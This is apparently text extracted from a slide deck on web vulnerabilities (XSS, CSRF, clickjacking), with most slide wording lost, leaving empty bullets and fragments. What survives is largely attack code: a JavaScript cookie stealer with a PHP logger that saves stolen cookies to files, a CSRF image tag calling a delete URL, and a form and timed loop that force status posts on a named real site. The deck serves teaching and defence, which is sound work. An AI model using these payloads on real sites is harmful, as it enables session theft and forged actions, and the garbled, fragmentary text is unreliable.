This document summarizes common web vulnerabilities including cross-site scripting (XSS), cross-site request forgery (CSRF), and clickjacking. It provides examples of how each vulnerability can be exploited, such as using JavaScript to steal cookies or make unauthorized requests. The document also lists recommendations for preventing these issues, like validating and sanitizing input, using anti-CSRF tokens, and disabling JavaScript for sensitive pages. Resources for further reading on each topic are included.

2. 2

3. 3

4. 4

5. •
–
–
–
•
•

9. Cross-site scripting XSS

10. XSS

11. • Cookie
• DOM
•
•…

12. Yupoo XSS

14. alert

15. Javascript
var img = new Image();
img.src = 'get_cookie.php?var='+encodeURI(document.cookie);
PHP
<?php
if (isset($_GET['var'])) {
file_put_contents('./cookie/'.time().'.txt',
urldecode($_GET['var']));
}

16. “ ”

19. • Filter input,Escape output
• Cookie
• noscript?

22. •
•

23. • http://en.wikipedia.org/wiki/Cross-site_scripting
• http://www.gracecode.com/archives/2517
• http://www.gracecode.com/archives/2491
• http://ha.ckers.org/xss.html
• http://www.xssed.com/

25. CSRF Cross Site Request Forgery

27. <img src=“http://.../del.php?id=64” />

32. <form action="http://jiwai.de/wo/status/update"
method="post">
<textarea name="jw_status"></textarea>
<input type="submit" />
</form>

33. •
• GET POST
•

34. setInterval(function() {
var img = new Image();
var message = ' ';
var api = 'http://jiwai.de/wo/status/
update';
img.src = api + '?jw_status=' + message +
'&t=' + +new Date();
}, 1000);

35. “ ”

41. • GET POST Cookie
• Referer
• Token
•

42. • _tb_token_
• Referer

43. • http://en.wikipedia.org/wiki/Cross-site_request_forgery
• http://www.cgisecurity.com/csrf-faq.html
• http://www.80sec.com/csrf-securit.html
• http://www.playhack.net/view.php?id=31

46. Twitter Clickjacking

47. 1. iframe Twitter
0
2. “ ”
3.
Twitter

49. •
•

53. CSRF

55. Cookie Session

56. • “JS ”
•
•

58. Q&A

60. 'alert(/tHx/)'.replace(/.+/, eval);